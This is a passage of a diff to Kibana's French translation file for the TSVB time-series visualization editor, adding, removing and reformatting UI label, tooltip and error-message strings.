peuvent être utilisées dans Markdown à l'aide de la syntaxe Handlebar (moustache). {handlebarLink} sur les expressions disponibles.", + "visTypeTimeseries.math.expressionDescription": "Ce champ utilise des expressions mathématiques de base (voir {link}). Les variables sont des clés sur l'objet {params}, c.-à-d. {paramsName}. Pour accéder à toutes les données, utilisez {paramsValues} pour un tableau de valeurs et {paramsTimestamps} pour un tableau d’horodatages. {paramsTimestamp} est disponible pour l'horodatage du compartiment actuel, {paramsIndex} est disponible pour l'index du compartiment actuel et {paramsInterval} est disponible pour l'intervalle en millisecondes.", + "visTypeTimeseries.metricMissingErrorMessage": "Indicateur manquant {field}", + "visTypeTimeseries.missingPanelConfigDescription": "Configuration de panneau manquante pour \"{modelType}\"", + "visTypeTimeseries.positiveRate.helpText": "Cette agrégation ne doit être appliquée qu'à {link} ; il s'agit d'un raccourci pour appliquer Max., Dérivée et Positif uniquement à un champ.", + "visTypeTimeseries.replaceVars.errors.unknownVarDescription": "{badVar} est une variable inconnue.", + "visTypeTimeseries.seriesConfig.missingSeriesComponentDescription": "Composant de série manquant pour le type de panneau : {panelType}", + "visTypeTimeseries.seriesConfig.templateHelpText": "par ex. {templateExample}", + "visTypeTimeseries.seriesRequest.label": "Série : {id}", + "visTypeTimeseries.table.optionsTab.itemUrlHelpText": "Prend en charge les modèles de moustaches. {key} est défini sur le terme.", + "visTypeTimeseries.table.templateHelpText": "par ex. {templateExample}", + "visTypeTimeseries.tableRequest.label": "Tableau : {id}", + "visTypeTimeseries.timeSeries.templateHelpText": "par ex. {templateExample}", + "visTypeTimeseries.topN.optionsTab.itemUrlDescription": "Prend en charge les modèles de moustaches. {key} est défini sur le terme.", + "visTypeTimeseries.unsupportedSplit.splitIsUnsupportedDescription": "Diviser par {modelType} n'est pas pris en charge.", + "visTypeTimeseries.visEditorVisualization.dataViewMode.notificationMessage": "Bonne nouvelle ! Vous pouvez visualiser les données des vues de données Kibana (recommandé) ou des index Elasticsearch. {indexPatternModeLink}.", + "visTypeTimeseries.wrongAggregationErrorMessage": "l'agrégation {metricType} n’est pas compatible pour la configuration de panneau existante.", "visTypeTimeseries.addDeleteButtons.addButtonDefaultTooltip": "Ajouter", "visTypeTimeseries.addDeleteButtons.cloneButtonDefaultTooltip": "Cloner", "visTypeTimeseries.addDeleteButtons.deleteButtonDefaultTooltip": "Supprimer", @@ -6268,12 +5482,9 @@ "visTypeTimeseries.addDeleteButtons.temporarilyDisableTooltip": "Désactiver temporairement", "visTypeTimeseries.advancedSettings.allowCheckingForFailedShardsText": "Afficher un message d'avertissement pour les données partielles dans les graphiques TSVB si la requête réussit pour certaines partitions, mais échoue pour d'autres.", "visTypeTimeseries.advancedSettings.allowCheckingForFailedShardsTitle": "Afficher les échecs de partition de requête TSVB", - "visTypeTimeseries.advancedSettings.allowStringIndicesText": "Vous permet d'interroger les index Elasticsearch dans les visualisations TSVB.", "visTypeTimeseries.advancedSettings.allowStringIndicesTitle": "Autoriser les index de chaîne dans TSVB", - "visTypeTimeseries.advancedSettings.maxBucketsText": "A un impact sur la densité de l'histogramme TSVB. Doit être défini sur une valeur supérieure à \"histogram:maxBars\".", - "visTypeTimeseries.advancedSettings.maxBucketsTitle": "Limite de compartiments TSVB", - "visTypeTimeseries.agg.aggIsNotSupportedDescription": "L'agrégation {modelType} n'est plus prise en charge.", - "visTypeTimeseries.agg.aggIsUnsupportedForPanelConfigDescription": "l'agrégation {modelType} n’est pas compatible pour la configuration de panneau existante.", + "visTypeTimeseries.advancedSettings.maxBucketsText": "A un impact sur la densité de l'histogramme TSVB. Doit être défini sur une valeur supérieure à \"histogram:maxBars\".", + "visTypeTimeseries.advancedSettings.maxBucketsTitle": "Limite de compartiments TSVB", "visTypeTimeseries.aggRow.addMetricButtonTooltip": "Ajouter un indicateur", "visTypeTimeseries.aggRow.deleteMetricButtonTooltip": "Supprimer un indicateur", "visTypeTimeseries.aggSelect.aggGroups.metricAggLabel": "Agrégations d'indicateurs", @@ -6312,48 +5523,35 @@ "visTypeTimeseries.aggUtils.topHitLabel": "Meilleur résultat", "visTypeTimeseries.aggUtils.valueCountLabel": "Nombre de valeurs", "visTypeTimeseries.aggUtils.varianceLabel": "Variance", - "visTypeTimeseries.annotationRequest.label": "Annotation : {id}", "visTypeTimeseries.annotationsEditor.addDataSourceButtonLabel": "Ajouter une source de données", "visTypeTimeseries.annotationsEditor.dataSourcesLabel": "Sources de données", "visTypeTimeseries.annotationsEditor.fieldsLabel": "Champs (requis – chemins séparés par des virgules)", "visTypeTimeseries.annotationsEditor.howToCreateAnnotationDataSourceDescription": "Cliquez sur le bouton ci-dessous pour créer une source de données d'annotation.", "visTypeTimeseries.annotationsEditor.iconLabel": "Icône (requis)", - "visTypeTimeseries.annotationsEditor.ignoreGlobalFiltersLabel": "Ignorer les filtres globaux ?", - "visTypeTimeseries.annotationsEditor.ignorePanelFiltersLabel": "Ignorer les filtres de panneau ?", + "visTypeTimeseries.annotationsEditor.ignoreGlobalFiltersLabel": "Ignorer les filtres globaux ?", + "visTypeTimeseries.annotationsEditor.ignorePanelFiltersLabel": "Ignorer les filtres de panneau ?", "visTypeTimeseries.annotationsEditor.queryStringLabel": "Chaîne de requête", - "visTypeTimeseries.annotationsEditor.rowTemplateHelpText": "eg.{rowTemplateExample}", "visTypeTimeseries.annotationsEditor.rowTemplateLabel": "Modèle de ligne (requis)", "visTypeTimeseries.annotationsEditor.timeFieldLabel": "Champ temporel (requis)", - "visTypeTimeseries.axisLabelOptions.axisLabel": "par {unitValue} {unitString}", "visTypeTimeseries.calculateLabel.bucketScriptsLabel": "Script de compartiment", "visTypeTimeseries.calculateLabel.countLabel": "Décompte", "visTypeTimeseries.calculateLabel.filterRatioLabel": "Rapport de filtre", "visTypeTimeseries.calculateLabel.mathLabel": "Mathématique", - "visTypeTimeseries.calculateLabel.metricTypeOfMetricFieldRankLabel": "{metricTypeLabel} de {metricField}", - "visTypeTimeseries.calculateLabel.metricTypeOfTargetLabel": "{metricTypeLabel} de {targetLabel}", - "visTypeTimeseries.calculateLabel.metricTypeOfTargetWithAdditionalLabel": "{metricTypeLabel} de {targetLabel} ({additionalLabel})", - "visTypeTimeseries.calculateLabel.positiveRateLabel": "Taux de compteur de {field}", - "visTypeTimeseries.calculateLabel.seriesAggLabel": "Agrégation de séries ({metricFunction})", - "visTypeTimeseries.calculateLabel.staticValueLabel": "Valeur statique de {metricValue}", "visTypeTimeseries.calculateLabel.unknownLabel": "Inconnu", "visTypeTimeseries.calculation.aggregationLabel": "Agrégation", - "visTypeTimeseries.calculation.painlessScriptDescription": "Les variables sont des clés sur l'objet {params}, c.-à-d. {paramsName}. Pour accéder à l'intervalle de compartiment (en millisecondes), utilisez {paramsInterval}.", "visTypeTimeseries.calculation.painlessScriptLabel": "Script Painless", "visTypeTimeseries.calculation.variablesLabel": "Variables", "visTypeTimeseries.colorPicker.clearIconLabel": "Effacer", "visTypeTimeseries.colorPicker.notAccessibleAriaLabel": "Sélecteur de couleur, non accessible", - "visTypeTimeseries.colorPicker.notAccessibleWithValueAriaLabel": "Sélecteur de couleur ({value}), non accessible", "visTypeTimeseries.colorRules.adjustChartSizeAriaLabel": "Utilisez les flèches haut/bas pour ajuster la taille du graphique.", "visTypeTimeseries.colorRules.defaultPrimaryNameLabel": "arrière-plan", "visTypeTimeseries.colorRules.defaultSecondaryNameLabel": "texte", "visTypeTimeseries.colorRules.emptyLabel": "vide", - "visTypeTimeseries.colorRules.greaterThanLabel": "> supérieur à", - "visTypeTimeseries.colorRules.greaterThanOrEqualLabel": ">= supérieur ou égal à", + "visTypeTimeseries.colorRules.greaterThanLabel": "> supérieur à", + "visTypeTimeseries.colorRules.greaterThanOrEqualLabel": ">= supérieur ou égal à", "visTypeTimeseries.colorRules.ifMetricIsLabel": "si l'indicateur est", - "visTypeTimeseries.colorRules.lessThanLabel": "< inférieur à", - "visTypeTimeseries.colorRules.lessThanOrEqualLabel": "<= inférieur ou égal à", - "visTypeTimeseries.colorRules.setPrimaryColorLabel": "Définissez {primaryName} sur", - "visTypeTimeseries.colorRules.setSecondaryColorLabel": "et {secondaryName} sur", + "visTypeTimeseries.colorRules.lessThanLabel": "< inférieur à", + "visTypeTimeseries.colorRules.lessThanOrEqualLabel": "<= inférieur ou égal à", "visTypeTimeseries.colorRules.valueAriaLabel": "Valeur", "visTypeTimeseries.cumulativeSum.aggregationLabel": "Agrégation", "visTypeTimeseries.cumulativeSum.metricLabel": "Indicateur", @@ -6364,7 +5562,6 @@ "visTypeTimeseries.dataFormatPicker.defaultLabelDescription": "Applique une mise en forme commune", "visTypeTimeseries.dataFormatPicker.durationLabel": "Durée", "visTypeTimeseries.dataFormatPicker.formatPatternHelpText": "Documentation", - "visTypeTimeseries.dataFormatPicker.formatPatternLabel": "Modèle de format Numeral.js (par défaut : {defaultPattern})", "visTypeTimeseries.dataFormatPicker.fromLabel": "De", "visTypeTimeseries.dataFormatPicker.numberLabel": "Nombre", "visTypeTimeseries.dataFormatPicker.percentLabel": "Pour cent", @@ -6372,7 +5569,7 @@ "visTypeTimeseries.defaultDataFormatterLabel": "Formateur de données", "visTypeTimeseries.derivative.aggregationLabel": "Agrégation", "visTypeTimeseries.derivative.metricLabel": "Indicateur", - "visTypeTimeseries.derivative.unitsLabel": "Unités (1s, 1m, etc.)", + "visTypeTimeseries.derivative.unitsLabel": "Unités (1s, 1m, etc.)", "visTypeTimeseries.durationOptions.daysLabel": "Jours", "visTypeTimeseries.durationOptions.hoursLabel": "Heures", "visTypeTimeseries.durationOptions.humanize": "Lisible par l'utilisateur", @@ -6387,25 +5584,20 @@ "visTypeTimeseries.durationOptions.yearsLabel": "Années", "visTypeTimeseries.emptyTextValue": "(vide)", "visTypeTimeseries.error.requestForPanelFailedErrorMessage": "La requête pour ce panneau a échoué.", - "visTypeTimeseries.errors.dataViewNotFoundError": "Impossible de trouver la vue de données : {dataViewId}", - "visTypeTimeseries.errors.fieldNotFound": "Champ \"{field}\" introuvable", "visTypeTimeseries.errors.maxBucketsExceededErrorMessage": "Votre recherche a essayé de récupérer trop de données. Réduisez la plage de temps ou modifiez l'intervalle utilisé. Cela permet généralement de résoudre le problème.", "visTypeTimeseries.errors.timeFieldNotSpecifiedError": "Le champ temporel est obligatoire pour visualiser les données", - "visTypeTimeseries.externalUrlErrorModal.bodyMessage": "Configurez {externalUrlPolicy} dans votre {kibanaConfigFileName} pour autoriser l'accès à {url}.", "visTypeTimeseries.externalUrlErrorModal.closeButtonLabel": "Fermer", "visTypeTimeseries.externalUrlErrorModal.headerTitle": "l'accès à cette URL externe n’est pas encore activé", "visTypeTimeseries.fetchFields.loadIndexPatternFieldsErrorMessage": "Impossible de charger les champs index_pattern", "visTypeTimeseries.fieldSelect.dragAriaLabel": "Faire glisser le champ", - "visTypeTimeseries.fieldSelect.fieldIsNotValid": "La sélection \"{fieldParameter}\" n'est pas valide pour une utilisation avec l'index actuel.", "visTypeTimeseries.fieldSelect.selectFieldPlaceholder": "Sélectionner un champ…", - "visTypeTimeseries.fieldUtils.multiFieldLabel": "{firstFieldLabel} + {count} {count, plural, one {autre} other {autres}}", "visTypeTimeseries.filterCannotBeAppliedError": "Le \"filter\" ne peut pas être appliqué avec cette configuration", "visTypeTimeseries.filterRatio.aggregationLabel": "Agrégation", "visTypeTimeseries.filterRatio.denominatorLabel": "Dénominateur", "visTypeTimeseries.filterRatio.fieldLabel": "Champ", "visTypeTimeseries.filterRatio.metricAggregationLabel": "Agrégation d'indicateurs", "visTypeTimeseries.filterRatio.numeratorLabel": "Numérateur", - "visTypeTimeseries.function.help": "Visualisation TSVB", + "visTypeTimeseries.function.help": "Visualisation TSVB", "visTypeTimeseries.gauge.dataTab.dataButtonLabel": "Données", "visTypeTimeseries.gauge.dataTab.metricsButtonLabel": "Indicateurs", "visTypeTimeseries.gauge.editor.addSeriesTooltip": "Ajouter une série", @@ -6413,14 +5605,14 @@ "visTypeTimeseries.gauge.editor.deleteSeriesTooltip": "Supprimer la série", "visTypeTimeseries.gauge.editor.labelPlaceholder": "Étiquette", "visTypeTimeseries.gauge.editor.toggleEditorAriaLabel": "Activer/Désactiver l'éditeur de séries", - "visTypeTimeseries.gauge.optionsTab.backgroundColorLabel": "Couleur d'arrière-plan :", + "visTypeTimeseries.gauge.optionsTab.backgroundColorLabel": "Couleur d'arrière-plan :", "visTypeTimeseries.gauge.optionsTab.colorRulesLabel": "Règles de couleur", "visTypeTimeseries.gauge.optionsTab.dataLabel": "Données", "visTypeTimeseries.gauge.optionsTab.gaugeLineWidthLabel": "Largeur de la ligne de jauge", "visTypeTimeseries.gauge.optionsTab.gaugeMaxLabel": "Jauge max. (vide pour auto)", "visTypeTimeseries.gauge.optionsTab.gaugeStyleLabel": "Style de jauge", - "visTypeTimeseries.gauge.optionsTab.ignoreGlobalFilterLabel": "Ignorer le filtre global ?", - "visTypeTimeseries.gauge.optionsTab.innerColorLabel": "Couleur intérieure :", + "visTypeTimeseries.gauge.optionsTab.ignoreGlobalFilterLabel": "Ignorer le filtre global ?", + "visTypeTimeseries.gauge.optionsTab.innerColorLabel": "Couleur intérieure :", "visTypeTimeseries.gauge.optionsTab.innerLineWidthLabel": "Largeur de la ligne intérieure", "visTypeTimeseries.gauge.optionsTab.optionsButtonLabel": "Options", "visTypeTimeseries.gauge.optionsTab.panelFilterLabel": "Filtre de panneau", @@ -6453,35 +5645,28 @@ "visTypeTimeseries.iconSelect.tagLabel": "Balise", "visTypeTimeseries.indexPattern.detailLevel": "Niveau de détail", "visTypeTimeseries.indexPattern.detailLevelAriaLabel": "Niveau de détail", - "visTypeTimeseries.indexPattern.detailLevelHelpText": "Contrôle les intervalles auto et gte en fonction de la plage temporelle. Les paramètres avancés {histogramTargetBars} et {histogramMaxBars} ont un impact sur l'intervalle par défaut.", - "visTypeTimeseries.indexPattern.dropLastBucketLabel": "Abandonner le dernier compartiment ?", + "visTypeTimeseries.indexPattern.dropLastBucketLabel": "Abandonner le dernier compartiment ?", "visTypeTimeseries.indexPattern.finest": "Plus fin", - "visTypeTimeseries.indexPattern.intervalHelpText": "Exemples : auto, 1m, 1d, 7d, 1y, >=1m", + "visTypeTimeseries.indexPattern.intervalHelpText": "Exemples : auto, 1m, 1d, 7d, 1y, >=1m", "visTypeTimeseries.indexPattern.intervalLabel": "Intervalle", "visTypeTimeseries.indexPattern.timeFieldLabel": "Champ temporel", "visTypeTimeseries.indexPattern.timeRange.entireTimeRange": "Toute la plage temporelle", - "visTypeTimeseries.indexPattern.timeRange.error": "Vous ne pouvez pas utiliser \"{mode}\" avec le type d'index actuel.", "visTypeTimeseries.indexPattern.timeRange.hint": "Ce paramètre contrôle la période utilisée pour la mise en correspondance des documents. L'option \"Toute la plage temporelle\" mettra en correspondance tous les documents sélectionnés dans le sélecteur d'heure. L'option \"Dernière valeur\" ne mettra en correspondance que les documents pour l'intervalle spécifié à partir de la fin de la plage temporelle.", "visTypeTimeseries.indexPattern.timeRange.label": "Mode de plage temporelle des données", "visTypeTimeseries.indexPattern.timeRange.lastValue": "Dernière valeur", "visTypeTimeseries.indexPattern.timeRange.selectTimeRange": "Sélectionner", "visTypeTimeseries.indexPattern.сoarse": "Grossier", "visTypeTimeseries.indexPatternSelect.createDataViewText": "Créer une vue de données", - "visTypeTimeseries.indexPatternSelect.defaultDataViewText": "Utilisation de la vue de données par défaut. {queryAllIndicesHelpText}", "visTypeTimeseries.indexPatternSelect.label": "Vue de données", - "visTypeTimeseries.indexPatternSelect.queryAllIndicesText": "Pour interroger tous les index, utilisez {asterisk}.", + "visTypeTimeseries.indexPatternSelect.noDataView": "Vue de données introuvable", "visTypeTimeseries.indexPatternSelect.switchModePopover.allowStringIndices": "Autoriser les index de chaîne dans TSVB", "visTypeTimeseries.indexPatternSelect.switchModePopover.areaLabel": "Configurer le mode de sélection de la vue de données", - "visTypeTimeseries.indexPatternSelect.switchModePopover.enableAllowStringIndices": "Pour interroger des index Elasticsearch, vous devez activer le paramètre {allowStringIndices}.", - "visTypeTimeseries.indexPatternSelect.switchModePopover.text": "Une vue de données regroupe et récupère les données à partir d'Elasticsearch. Désactivez ce mode pour interroger directement les index Elasticsearch. {allowStringIndicesLabel}", "visTypeTimeseries.indexPatternSelect.switchModePopover.title": "Mode de vue de données", "visTypeTimeseries.indexPatternSelect.switchModePopover.useKibanaIndices": "Utiliser des vues de données Kibana", "visTypeTimeseries.kbnVisTypes.metricsDescription": "Réalisez des analyses avancées de vos données temporelles.", "visTypeTimeseries.kbnVisTypes.metricsTitle": "TSVB", - "visTypeTimeseries.lastValueModeIndicator.lastBucketDate": "Compartiment : {lastBucketDate}", "visTypeTimeseries.lastValueModeIndicator.lastValue": "Dernière valeur", "visTypeTimeseries.lastValueModeIndicator.lastValueModeBadgeAriaLabel": "Afficher les détails de la dernière valeur", - "visTypeTimeseries.lastValueModeIndicator.panelInterval": "Intervalle : {formattedPanelInterval}", "visTypeTimeseries.lastValueModePopover.gearButton": "Modifier l'option d'affichage de l'indicateur Dernière valeur", "visTypeTimeseries.lastValueModePopover.switch": "Afficher l'étiquette lors de l'utilisation du mode Dernière valeur", "visTypeTimeseries.lastValueModePopover.title": "Options de Dernière valeur", @@ -6496,25 +5681,22 @@ "visTypeTimeseries.markdown.editor.labelPlaceholder": "Étiquette", "visTypeTimeseries.markdown.editor.toggleEditorAriaLabel": "Activer/Désactiver l'éditeur de séries", "visTypeTimeseries.markdown.editor.variableNamePlaceholder": "Nom de la variable", - "visTypeTimeseries.markdown.optionsTab.backgroundColorLabel": "Couleur d'arrière-plan :", + "visTypeTimeseries.markdown.optionsTab.backgroundColorLabel": "Couleur d'arrière-plan :", "visTypeTimeseries.markdown.optionsTab.customCSSLabel": "CSS personnalisée", "visTypeTimeseries.markdown.optionsTab.dataLabel": "Données", - "visTypeTimeseries.markdown.optionsTab.ignoreGlobalFilterLabel": "Ignorer le filtre global ?", - "visTypeTimeseries.markdown.optionsTab.openLinksInNewTab": "Ouvrir les liens dans un nouvel onglet ?", + "visTypeTimeseries.markdown.optionsTab.ignoreGlobalFilterLabel": "Ignorer le filtre global ?", + "visTypeTimeseries.markdown.optionsTab.openLinksInNewTab": "Ouvrir les liens dans un nouvel onglet ?", "visTypeTimeseries.markdown.optionsTab.optionsButtonLabel": "Options", "visTypeTimeseries.markdown.optionsTab.panelFilterLabel": "Filtre de panneau", "visTypeTimeseries.markdown.optionsTab.panelOptionsButtonLabel": "Options du panneau", - "visTypeTimeseries.markdown.optionsTab.showScrollbarsLabel": "Afficher les barres de défilement ?", + "visTypeTimeseries.markdown.optionsTab.showScrollbarsLabel": "Afficher les barres de défilement ?", "visTypeTimeseries.markdown.optionsTab.styleLabel": "Style", - "visTypeTimeseries.markdown.optionsTab.verticalAlignmentLabel": "Alignement vertical :", - "visTypeTimeseries.markdownEditor.howToAccessEntireTreeDescription": "Il existe également une variable spéciale nommée {all} que vous pouvez utiliser pour accéder à l'ensemble de l'arborescence. C'est utile pour créer des listes avec des données à l'aide d'une action Regrouper par :", - "visTypeTimeseries.markdownEditor.howToUseVariablesInMarkdownDescription": "Les variables suivantes peuvent être utilisées dans Markdown à l'aide de la syntaxe Handlebar (moustache). {handlebarLink} sur les expressions disponibles.", + "visTypeTimeseries.markdown.optionsTab.verticalAlignmentLabel": "Alignement vertical :", "visTypeTimeseries.markdownEditor.howUseVariablesInMarkdownDescription.documentationLinkText": "Cliquer ici pour la documentation", "visTypeTimeseries.markdownEditor.nameLabel": "Nom", "visTypeTimeseries.markdownEditor.noVariablesAvailableDescription": "Aucune variable disponible pour les indicateurs de données sélectionnés.", "visTypeTimeseries.markdownEditor.valueLabel": "Valeur", "visTypeTimeseries.math.aggregationLabel": "Agrégation", - "visTypeTimeseries.math.expressionDescription": "Ce champ utilise des expressions mathématiques de base (voir {link}). Les variables sont des clés sur l'objet {params}, c.-à-d. {paramsName}. Pour accéder à toutes les données, utilisez {paramsValues} pour un tableau de valeurs et {paramsTimestamps} pour un tableau d’horodatages. {paramsTimestamp} est disponible pour l'horodatage du compartiment actuel, {paramsIndex} est disponible pour l'index du compartiment actuel et {paramsInterval} est disponible pour l'intervalle en millisecondes.", "visTypeTimeseries.math.expressionDescription.tinyMathLinkText": "TinyMath", "visTypeTimeseries.math.expressionLabel": "Expression", "visTypeTimeseries.math.variablesLabel": "Variables", @@ -6527,13 +5709,11 @@ "visTypeTimeseries.metric.editor.toggleEditorAriaLabel": "Activer/Désactiver l'éditeur de séries", "visTypeTimeseries.metric.optionsTab.colorRulesLabel": "Règles de couleur", "visTypeTimeseries.metric.optionsTab.dataLabel": "Données", - "visTypeTimeseries.metric.optionsTab.ignoreGlobalFilterLabel": "Ignorer le filtre global ?", + "visTypeTimeseries.metric.optionsTab.ignoreGlobalFilterLabel": "Ignorer le filtre global ?", "visTypeTimeseries.metric.optionsTab.optionsButtonLabel": "Options", "visTypeTimeseries.metric.optionsTab.panelFilterLabel": "Filtre de panneau", - "visTypeTimeseries.metric.optionsTab.panelOptionsButtonLabel": "Options du panneau", - "visTypeTimeseries.metricMissingErrorMessage": "Indicateur manquant {field}", + "visTypeTimeseries.metric.optionsTab.panelOptionsButtonLabel": "Options de panneau", "visTypeTimeseries.metricSelect.selectMetricPlaceholder": "Sélectionner l'indicateur…", - "visTypeTimeseries.missingPanelConfigDescription": "Configuration de panneau manquante pour \"{modelType}\"", "visTypeTimeseries.movingAverage.aggregationLabel": "Agrégation", "visTypeTimeseries.movingAverage.alpha": "Alpha", "visTypeTimeseries.movingAverage.beta": "Bêta", @@ -6556,30 +5736,28 @@ "visTypeTimeseries.noButtonLabel": "Non", "visTypeTimeseries.percentile.aggregationLabel": "Agrégation", "visTypeTimeseries.percentile.fieldLabel": "Champ", - "visTypeTimeseries.percentile.fillToLabel": "Remplir à :", - "visTypeTimeseries.percentile.modeLabel": "Mode :", + "visTypeTimeseries.percentile.fillToLabel": "Remplir à :", + "visTypeTimeseries.percentile.modeLabel": "Mode :", "visTypeTimeseries.percentile.modeOptions.bandLabel": "Bande", "visTypeTimeseries.percentile.modeOptions.lineLabel": "Ligne", "visTypeTimeseries.percentile.percentile": "Centile", "visTypeTimeseries.percentile.percentileAriaLabel": "Centile", "visTypeTimeseries.percentile.percents": "Pour cent", - "visTypeTimeseries.percentile.shadeLabel": "Ombre (0 à 1) :", - "visTypeTimeseries.percentileHdr.numberOfSignificantValueDigits": "Nombre de chiffres à valeur significative (histogramme HDR)", - "visTypeTimeseries.percentileHdr.numberOfSignificantValueDigits.hint": "L'histogramme HDR (High Dynamic Range, grande plage dynamique) est une autre implémentation qui peut être utile lors du calcul des rangs centiles pour les mesures de la latence, car elle peut être plus rapide que l'implémentation t-digest, bien qu'elle présente une empreinte mémoire plus élevée. Le paramètre \"Nombre de chiffres à valeur significative\" spécifie le nombre de chiffres significatifs pour la résolution des valeurs de l'histogramme.", + "visTypeTimeseries.percentile.shadeLabel": "Ombre (0 à 1) :", + "visTypeTimeseries.percentileHdr.numberOfSignificantValueDigits": "Nombre de chiffres à valeur significative (histogramme HDR)", + "visTypeTimeseries.percentileHdr.numberOfSignificantValueDigits.hint": "L'histogramme HDR (High Dynamic Range, grande plage dynamique) est une autre implémentation qui peut être utile lors du calcul des rangs centiles pour les mesures de la latence, car elle peut être plus rapide que l'implémentation t-digest, bien qu'elle présente une empreinte mémoire plus élevée. Le paramètre \"Nombre de chiffres à valeur significative\" spécifie le nombre de chiffres significatifs pour la résolution des valeurs de l'histogramme.", "visTypeTimeseries.percentileRank.aggregationLabel": "Agrégation", "visTypeTimeseries.percentileRank.fieldLabel": "Champ", "visTypeTimeseries.percentileRank.values": "Valeurs", "visTypeTimeseries.positiveOnly.aggregationLabel": "Agrégation", "visTypeTimeseries.positiveOnly.metricLabel": "Indicateur", "visTypeTimeseries.positiveRate.aggregationLabel": "Agrégation", - "visTypeTimeseries.positiveRate.helpText": "Cette agrégation ne doit être appliquée qu'à {link} ; il s'agit d'un raccourci pour appliquer Max., Dérivée et Positif uniquement à un champ.", "visTypeTimeseries.positiveRate.helpTextLink": "nombres augmentant de manière monolithique", "visTypeTimeseries.positiveRate.unitSelectPlaceholder": "Sélectionner le scaling…", "visTypeTimeseries.positiveRate.unitsLabel": "Scaling", "visTypeTimeseries.postiveRate.fieldLabel": "Champ", "visTypeTimeseries.replaceVars.errors.markdownErrorDescription": "Veuillez vérifier que vous utilisez uniquement Markdown, des variables connues et des expressions Handlebar intégrées.", "visTypeTimeseries.replaceVars.errors.markdownErrorTitle": "Erreur lors du traitement de votre Markdown", - "visTypeTimeseries.replaceVars.errors.unknownVarDescription": "{badVar} est une variable inconnue.", "visTypeTimeseries.replaceVars.errors.unknownVarTitle": "Erreur lors du traitement de votre Markdown", "visTypeTimeseries.searchStrategyUndefinedErrorMessage": "La stratégie de recherche n'était pas définie.", "visTypeTimeseries.serialDiff.aggregationLabel": "Agrégation", @@ -6603,13 +5781,10 @@ "visTypeTimeseries.seriesAgg.seriesAggIsNotCompatibleLabel": "L'agrégation de séries n'est pas compatible avec la visualisation de tableau.", "visTypeTimeseries.seriesConfig.filterLabel": "Filtre", "visTypeTimeseries.seriesConfig.ignoreGlobalFilterDisabledTooltip": "Cette option est désactivée, car les filtres globaux sont ignorés dans les options du panneau.", - "visTypeTimeseries.seriesConfig.ignoreGlobalFilterLabel": "Ignorer le filtre global ?", - "visTypeTimeseries.seriesConfig.missingSeriesComponentDescription": "Composant de série manquant pour le type de panneau : {panelType}", + "visTypeTimeseries.seriesConfig.ignoreGlobalFilterLabel": "Ignorer le filtre global ?", "visTypeTimeseries.seriesConfig.offsetSeriesTimeLabel": "Décaler l'heure de la série de (1m, 1h, 1w, 1d)", - "visTypeTimeseries.seriesConfig.overrideDataViewLabel": "Écraser la vue de données ?", - "visTypeTimeseries.seriesConfig.templateHelpText": "par ex. {templateExample}", + "visTypeTimeseries.seriesConfig.overrideDataViewLabel": "Écraser la vue de données ?", "visTypeTimeseries.seriesConfig.templateLabel": "Modèle", - "visTypeTimeseries.seriesRequest.label": "Série : {id}", "visTypeTimeseries.sort.dragToSortAriaLabel": "Faire glisser pour trier", "visTypeTimeseries.sort.dragToSortTooltip": "Faire glisser pour trier", "visTypeTimeseries.splits.everything.groupByLabel": "Regrouper par", @@ -6675,8 +5850,7 @@ "visTypeTimeseries.table.minLabel": "Min", "visTypeTimeseries.table.noResultsAvailableWithDescriptionMessage": "Aucun résultat disponible. Vous devez choisir un champ Regrouper par pour cette visualisation.", "visTypeTimeseries.table.optionsTab.dataLabel": "Données", - "visTypeTimeseries.table.optionsTab.ignoreGlobalFilterLabel": "Ignorer le filtre global ?", - "visTypeTimeseries.table.optionsTab.itemUrlHelpText": "Prend en charge les modèles de moustaches. {key} est défini sur le terme.", + "visTypeTimeseries.table.optionsTab.ignoreGlobalFilterLabel": "Ignorer le filtre global ?", "visTypeTimeseries.table.optionsTab.itemUrlLabel": "URL de l'élément", "visTypeTimeseries.table.optionsTab.panelFilterLabel": "Filtre de panneau", "visTypeTimeseries.table.optionsTab.panelOptionsButtonLabel": "Options du panneau", @@ -6684,14 +5858,12 @@ "visTypeTimeseries.table.overallMaxLabel": "Max. général", "visTypeTimeseries.table.overallMinLabel": "Min. général", "visTypeTimeseries.table.overallSumLabel": "Somme générale", - "visTypeTimeseries.table.showTrendArrowsLabel": "Afficher les flèches de tendance ?", + "visTypeTimeseries.table.showTrendArrowsLabel": "Afficher les flèches de tendance ?", "visTypeTimeseries.table.sumLabel": "Somme", "visTypeTimeseries.table.tab.metricsLabel": "Indicateurs", "visTypeTimeseries.table.tab.optionsLabel": "Options", - "visTypeTimeseries.table.templateHelpText": "par ex. {templateExample}", "visTypeTimeseries.table.templateLabel": "Modèle", - "visTypeTimeseries.table.toggleSeriesEditorAriaLabel": "Activer/Désactiver l'éditeur de séries", - "visTypeTimeseries.tableRequest.label": "Tableau : {id}", + "visTypeTimeseries.table.toggleSeriesEditorAriaLabel": "Basculer l'éditeur de séries", "visTypeTimeseries.timeSeries.addSeriesTooltip": "Ajouter une série", "visTypeTimeseries.timeseries.annotationsTab.annotationsButtonLabel": "Annotations", "visTypeTimeseries.timeSeries.axisMaxLabel": "Max. de l'axe", @@ -6725,20 +5897,20 @@ "visTypeTimeseries.timeseries.optionsTab.axisMinLabel": "Min. de l'axe", "visTypeTimeseries.timeseries.optionsTab.axisPositionLabel": "Position de l'axe", "visTypeTimeseries.timeseries.optionsTab.axisScaleLabel": "Échelle de l'axe", - "visTypeTimeseries.timeseries.optionsTab.backgroundColorLabel": "Couleur de l'arrière-plan :", + "visTypeTimeseries.timeseries.optionsTab.backgroundColorLabel": "Couleur de l'arrière-plan :", "visTypeTimeseries.timeseries.optionsTab.dataLabel": "Données", "visTypeTimeseries.timeseries.optionsTab.displayGridLabel": "Afficher la grille", - "visTypeTimeseries.timeseries.optionsTab.ignoreDaylightTimeLabel": "Ignorer l'heure d'été ?", - "visTypeTimeseries.timeseries.optionsTab.ignoreGlobalFilterLabel": "Ignorer le filtre global ?", + "visTypeTimeseries.timeseries.optionsTab.ignoreDaylightTimeLabel": "Ignorer l'heure d'été ?", + "visTypeTimeseries.timeseries.optionsTab.ignoreGlobalFilterLabel": "Ignorer le filtre global ?", "visTypeTimeseries.timeseries.optionsTab.legendPositionLabel": "Position de la légende", "visTypeTimeseries.timeseries.optionsTab.maxLinesLabel": "Nombre maxi de lignes de légende", "visTypeTimeseries.timeseries.optionsTab.panelFilterLabel": "Filtre de panneau", "visTypeTimeseries.timeseries.optionsTab.panelOptionsButtonLabel": "Options du panneau", - "visTypeTimeseries.timeseries.optionsTab.showLegendLabel": "Afficher la légende ?", + "visTypeTimeseries.timeseries.optionsTab.showLegendLabel": 